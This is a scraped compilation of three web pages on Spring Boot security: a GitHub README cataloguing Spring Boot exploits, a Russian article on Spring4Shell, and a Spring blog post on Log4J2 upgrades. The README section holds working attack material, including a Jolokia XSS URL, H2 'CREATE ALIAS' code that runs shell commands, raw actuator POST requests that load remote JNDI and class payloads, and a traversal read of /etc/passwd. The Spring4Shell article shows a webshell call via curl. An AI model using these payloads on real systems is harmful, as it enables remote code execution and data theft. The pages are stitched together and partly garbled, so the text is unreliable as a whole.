Java spring boot уязвимости

Saved searches

Use saved searches to filter your results more quickly

You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.

pyn3rd/Spring-Boot-Vulnerability

This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Sign In Required

Please sign in to use Codespaces.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching Xcode

If nothing happens, download Xcode and try again.

Launching Visual Studio Code

Your codespace will open once ready.

There was a problem preparing your codespace, please try again.

Latest commit

Git stats

Files

Failed to load latest commit information.

README.md

Spring Boot Vulnerability (Keep On Updating)

0x01 Spring Boot Actuator Exposed

Actuator endpoints allow you to monitor and interact with your Spring application. Spring Boot includes a number of built-in endpoints and you can also add your own. For example the health endpoint provides basic application health information. The following endpoints are available:

/autoconfig — Displays an auto-configuration report showing all auto-configuration candidates and the reason why they ‘were’ or ‘were not’ applied.

/beans — Displays a complete list of all the Spring beans in your application.

/configprops — Displays a collated list of all @ConfigurationProperties.

/dump — Performs a thread dump.

/heapdump — JVM heap dump information. Actually it is a binary file, you can utilize the tool named MemoryAnalyzer to analyze the file. Sometimes in this file maybe you can find PASSWORD / ACCESS_KEY / COOKIES / ACCESS_TOKEN or some sensitive information.

/env — Exposes properties from Spring’s ConfigurableEnvironment.

/health — Shows application health information (a simple ‘status’ when accessed over an unauthenticated connection or full message details when authenticated).

/info — Displays arbitrary application info.

/metrics — Shows ‘metrics’ information for the current application.

/mappings — Displays a collated list of all @RequestMapping paths.

/shutdown — Allows the application to be gracefully shutdown (not enabled by default).

/pause — Allows the application to be gracefully pause (not enabled by default).

/resume — Allows the application to be gracefully resume (not enabled by default).

/trace — Displays trace information (by default the last few HTTP requests).

0x02 Spring Boot RCE/XSS involving Jolokia

0x002 Jolokia XSS fixed since Jolokia 1.5.0 (CVE-2018-1000129)

  org.jolokia jolokia-core 1.4.0  

When visiting URL http://127.0.0.1:10090/actuator/jolokia/read%3Csvg%20onload=alert(‘xss’)%3E?mimeType=text/html

0x03 Spring Boot RCE involving H2 Database JNDI Injection

 org.springframework.boot spring-boot-starter-data-jpa 2.2.6.RELEASE  com.h2database h2 runtime 1.4.2  

spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 

You can visit /actutor/env to make sure H2 Console is enabled.

Example 1: Execute open -a Calculator Command

0x04 Spring Boot RCE involving H2 Database ALIAS Command

Example 1: Execute id Command

CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException < java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; >$$; CALL EXECMD('id') 

Example 2: Execute open -a Calculator Command

CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException < Runtime.getRuntime().exec(cmd);return null; >$$; CALL EXECMD('open -a Calculator'); 

0x05 Spring Boot RCE involving JMX enabled

When visiting URL http://127.0.0.1:10090/actuator/env/spring.jmx.enabled , you will find JMX is enabled.

Example 1: Execute open -a Calculator Command

0x06 Spring Boot RCE involving H2 Database

0x001 Remote Code Execution via spring.datasource.hikari.connection-test-query or spring.datasource.hikari.connection-init-sql

Example 1: spring.datasource.hikari.connection-init-sql

POST /actuator/env HTTP/1.1 Host: 127.0.0.1:10090 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/json Content-Length: 280 $$;CALL EXECMD('open -a Calculator');"> 

POST /actuator/restart HTTP/1.1 

POST /actuator/env HTTP/1.1 Host: 127.0.0.1:10090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Content-Type: application/json Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6 Connection: close Content-Length: 320 < "name": "spring.datasource.hikari.connection-init-sql", "value": "CREATE ALIAS jndi AS $$ import javax.naming.InitialContext;@CODE String jndi(String url) throws Exception $$;CALL jndi('ldap://127.0.0.1:1389/evilObject');" > 

POST /actuator/restart HTTP/1.1 

POST /actuator/env HTTP/1.1 Host: 127.0.0.1:10090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Content-Type: application/json Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6 Connection: close Content-Length: 320 < "name": "spring.datasource.hikari.connection-init-sql", "value": "CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception < Class.forName (\"pop\", true, new URLClassLoader(new URL[])).newInstance();return null;>$$;CALL remoteUrl()" > 

POST /actuator/restart HTTP/1.1 

0x07 Spring Boot RCE involving MyBatis (CVE-2020-26945)

0x08 Spring Boot Actuator Logview Directory Traversal (CVE-2021-21234)

Set Break Piont At securityCheck()

Construct Directory Traversal Request URL

spring.log/../../../../../ as folder, and /etc/passwd is the file we want

In toFile() , the folder spring.log/../../../../../ and the file /etc/passwd will be concated as path without securityCheck()

Retreive the content of file /etc/passwd

0x09 Spring Boot Log4j2 JNDI Injection

Источник

Spring4Shell RCE — критическая уязвимость в Java Spring Framework

Не успел мир отойти от Apache Log4j2 (CVE-2021-44228), как в сети появились сообщения о новых 0-day уязвимостях. В Spring Framework для Java обнаружено сразу несколько уязвимостей «нулевого дня», позволяющих, в том числе, выполнять произвольный код (RCE).

На данный момент выявлено 3 недостатка:

• RCE в библиотеке Spring Cloud Function (CVE-2022-22963) — уязвимость актуальна для версии библиотеки до 3.2.3;
• Уязвимость среднего уровня, которая может вызвать состояние DoS (CVE-2022-22950) — затрагивает версии Spring Framework с 5.3.0 по 5.3.16;
• Spring4Shell в Spring Core — уязвимость внедрения классов для эксплуатации RCE (еще не присвоен идентификатор CVE).

Информация представлена в ознакомительных целях, не нарушайте законодательство.

Spring4Shell в Spring Core

Клиенты, использующие JDK версии 9 и новее, уязвимы для атаки удаленного выполнения кода из-за обхода CVE-2010-1622. Уязвимости подвержены все версии Spring Core (исправление еще не выпущено). Уязвимость затрагивает функции, использующие RequestMapping и параметры POJO (Plain Old Java Object).

Работа эксплоита сводится к отправке запроса с параметрами class.module.classLoader.resources.context.parent.pipeline.first.*, обработка которых при использовании WebappClassLoaderBase приводит к обращению к классу AccessLogValve. Указанный класс позволяет настроить логгер для создания произвольного jsp-файла в корневом окружении Apache Tomcat и записи в этот файл указанного атакующим кода. Созданный файл становится доступным для прямых запросов.

Результатом эксплуатации будет созданный shell.jsp, при обращении к которому можно выполнять произвольные команды на сервере, например:

# curl http://example.com/shell.jsp?cmd=whoami

Эксплойт уже доступен в паблике, но по этическим соображениям мы не будем публиковать PoC.

Разработчики еще не выпустили патч, но вы можете использовать Nemesida WAF, блокирующий попытки эксплуатации этой и других уязвимостей, включая техники обхода. Оставайтесь защищенными.

Источник

Log4J2 Vulnerability and Spring Boot

Updates: Since this blog post has been published, a new logback 1.2.9 version has been published. While this fixes a security issue, prerequisites for exploits are very different as they «requires write access to logback’s configuration file». Log4J also released a new 2.17.0 version with fixes for CVE-2021-45046 and CVE-2021-45105. Spring Boot 2.5.8 and 2.6.2 haven been released and provide dependency management for logback 1.2.9 and Log4J 2.17.0. Log4J 2.17.1 contains a fix for CVE-2021-44832

As you may have seen in the news, a new zero-day exploit has been reported against the popular Log4J2 library which can allow an attacker to remotely execute code. The vulnerability has been reported with CVE-2021-44228 against the log4j-core jar and has been fixed in Log4J v2.15.0.

Spring Boot users are only affected by this vulnerability if they have switched the default logging system to Log4J2. The log4j-to-slf4j and log4j-api jars that we include in spring-boot-starter-logging cannot be exploited on their own. Only applications using log4j-core and including user input in log messages are vulnerable.

Our upcoming v2.5.8 & v2.6.2 releases (due Dec 23, 2021) will pick up Log4J v2.17.0, but since this is such a serious vulnerability you may want to override our dependency management and upgrade your Log4J2 dependency sooner.

Maven

For Maven users, you can follow these instructions and the set the log4j2.version property.

For example, if you are using our parent POM you can set the log4j2.version property:

If you are not using our parent, but instead are importing the spring-boot-dependencies BOM, you’ll need to use a section:

   org.apache.logging.log4j log4j-bom 2.17.1 import pom  . other dependencies including spring-boot-dependencies  

To check that the override as been applied run ./mvnw dependency:list | grep log4j and check that the version is 2.17.1.

Gradle

For Gradle users, you can follow these instructions and update the version property, import the BOM or use a resolutionStrategy .

For most users, setting the log4j2.version property will be sufficient:

If you’re using Gradle’s platform support instead of our dependency management plugin then you can add a dependency to the Log4J BOM:

implementation(platform("org.apache.logging.log4j:log4j-bom:2.17.1")) 

And if you can’t use either of those methods then you can declare a resolutionStrategy :

configurations.all < resolutionStrategy.eachDependency < DependencyResolveDetails details ->if (details.requested.group == 'org.apache.logging.log4j') < details.useVersion '2.17.1' >> > 

Whichever method you choose, to check that the override has been applied you can run ./gradlew dependencyInsight —dependency log4j-core and look for version 2.17.1.

Источник